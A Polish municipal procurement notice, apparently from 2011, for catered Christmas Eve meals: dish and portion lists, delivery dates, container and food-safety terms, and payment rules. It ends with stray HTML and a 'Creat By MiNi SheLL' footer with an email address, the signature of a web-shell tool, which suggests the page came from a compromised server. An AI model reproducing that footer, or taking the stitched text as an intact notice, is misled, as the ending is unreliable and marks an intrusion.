Przez posiłek Zamawiający rozumie:
a) śledź w oleju				- ok. 200 g/ osobę
b) barszcz z uszkami				- ok. 250 g + 75 g/ osobę
c) karp panierowany (smażony)		- ok. 200 g/ osobę
d) inny filet panierowany (smażony)		- ok. 200 g/ osobę
e) kapusta z grochem 			- ok. 150 g/ osobę
f) kompot z suszonych owoców		- ok. 200 ml/ osobę
g) pierogi ruskie				- ok. 200 g/ osobę
h) łazanki					- ok. 200 g/ osobę
i) makówki					- ok. 200 g/ osobę
j) opłatek
Cena posiłków powinna obejmować koszt surowców, przygotowania posiłków, opakowanie oraz transport.
Posiłek powinien odpowiadać wszelkim normom odżywczym obowiązującym w punktach zbiorowego żywienia. Nie dopuszcza się możliwości serwowania jako obiadu gotowych dań typu fast food oraz gotowych sproszkowanych zup. Posiłek ma formę obiadu wigilijnego. Potrawy muszą być świeże i dobrej jakości.
Wykonawca musi posiadać możliwość dowiezienia ciepłych posiłków do miejsc wykazanych powyżej. Posiłki należy dostarczyć w naczyniach szczelnie zamykanych, utrzymujących temperaturę, nie mogą być to pojemniki jednorazowe (opakowania plastikowe lub styropianowe). Naczynia, w których zostaną dostarczone posiłki należy odebrać do dnia 29.12.2011 r.
W ramach zamówienia Wykonawca jest zobowiązany do:
- dostarczania posiłków na w/w miejsca, w dzień wskazany przez Zamawiającego 
tj. 23.12.2011 r. dla Świetlic środowiskowych MOPR, 22.12.2011 r.  Środowiskowego Domu Samopomocy, 24.12.2011 r. dla Domu Noclegowego. 
- świadczenia usług cateringowych, wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych;
- przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m. in. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U. nr 171 poz. 1125 ze zm.);
Wykonawca wystawi fakturę VAT w terminie 3 dni od daty zakończenia realizacji umowy. Należność płatna będzie przelewem na wskazane konto w ciągu 5 dni licząc od dnia otrzymania faktury po jej pozytywnym zweryfikowaniu.
Warunkiem udziału w postępowaniu jest spełnienie warunków zawartych w SIWZ oraz art. 22 ust. 1 ustawy Pzp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com